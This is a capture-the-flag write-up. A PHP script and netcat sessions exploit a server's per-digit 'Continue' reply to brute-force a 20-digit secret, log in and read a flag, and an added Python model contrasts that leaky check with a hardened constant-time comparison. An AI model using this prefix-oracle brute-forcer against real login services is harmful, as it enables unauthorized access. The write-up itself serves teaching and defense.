Digital Treasure Chest (300)
You were asked to pentest the 1.1 beta-version of the digital treasure chest.
Finding an authentication bypass appears to be trivial to you.
pirates.fluxfingers.net 6969/tcp
$ nc pirates.fluxfingers.net 6969
010 WELCOME. Please Enter your secret digits
0
555 Wrong credentials
If we try some more numbers, we will get:
$ nc pirates.fluxfingers.net 6969
010 WELCOME. Please Enter your secret digits
9
011 Continue
5
555 Wrong credentials
Easy to guess: the server answers "011 Continue" as soon as a correct prefix is entered, so we are meant to brute-force the secret digits one by one (not the whole number). Here is a simple PHP script for that:
<?php
$key = "";
while (1) {
    for ($i = 0; $i < 10; $i++) {
        $f = fsockopen("pirates.fluxfingers.net", 6969);
        fgets($f);                 // banner: "010 WELCOME. Please Enter your secret digits"
        fwrite($f, "$key$i\n");    // send the known prefix plus one more digit
        $s = fgets($f);
        fclose($f);
        if (strpos($s, "011") !== false) {   // "011 Continue": this digit is correct
            $key .= $i;
            echo $i;
            break;
        }
        if (strpos($s, "555") === false) {   // anything other than "555 Wrong credentials"
            echo "\nSTRANGE ANSWER (key={$key}{$i}): $s\n";
            die();
        }
    }
}
?>
Running it:
$ php pwn.php
9200372140803765602
STRANGE ANSWER (key=92003721408037656022): 100 Login successful

$ nc pirates.fluxfingers.net 6969
010 WELCOME. Please Enter your secret digits
92003721408037656022
100 Login successful
help
310 Command listing
version (show version number)
list (list treasure chests)
show N (show content Nth chest)
empty (empty the Nth chest - not available yet)
fill N M (fill Nth chest with M gold - not available yet)
quit (quit)
list
310 Listing chests:
1) DTCE Monthly Newsletter
2) damn secret
3) Welcome to our Digital Treasure Chest Enterprise
show 2
310
---------------
damn yer those bloody royal guards. I just want my rrrrum!
also, the Key is 'f00k1namaZ!ng'
Funny: A pirate does not "go shopping". Unless by "shopping", you mean "killing".
---------------
The flag: f00k1namaZ!ng
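The root cause is the per-prefix feedback: a 20-digit secret that should cost up to 10^20 guesses falls in at most 200. The Python model below is an added example, not part of the original writeup; it reproduces the leaky check as observed in the session, puts a hardened check beside it (full-length constant-time comparison, one uniform failure reply), and counts the guesses a prefix-extending guesser needs against each. The secret value is taken from the session above; the function names are assumptions.

```python
import hmac
from typing import Callable, Optional

# Secret recovered in the session above (constructed input for this demo).
SECRET = "92003721408037656022"


def leaky_check(attempt: str, secret: str = SECRET) -> str:
    """Models the challenge server: a correct prefix of the secret is
    acknowledged with '011 Continue', leaking the secret one digit at a time."""
    if attempt == secret:
        return "100 Login successful"
    if secret.startswith(attempt):
        return "011 Continue"
    return "555 Wrong credentials"


def hardened_check(attempt: str, secret: str = SECRET) -> str:
    """Hardened version: only the complete secret is compared, in constant
    time, and every mismatch (a correct prefix included) gets the same reply."""
    if hmac.compare_digest(attempt.encode(), secret.encode()):
        return "100 Login successful"
    return "555 Wrong credentials"


def oracle_queries(check: Callable[[str], str]) -> Optional[int]:
    """Count the queries a prefix-extending guesser needs against `check`.
    Returns None when no single digit is ever accepted, i.e. the server
    gives no partial feedback that could be extended."""
    key, queries = "", 0
    while True:
        for digit in "0123456789":
            queries += 1
            reply = check(key + digit)
            if reply.startswith("100"):
                return queries
            if reply.startswith("011"):
                key += digit
                break
        else:
            return None  # all ten digits rejected: nothing to extend


if __name__ == "__main__":
    print("leaky server:   ", oracle_queries(leaky_check), "queries")
    print("hardened server:", oracle_queries(hardened_check))
```

On the hardened server the only remaining strategy is a full 10^20 search, which rate limiting or lockout after a few failed attempts makes impractical.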
Thanks for the writeup!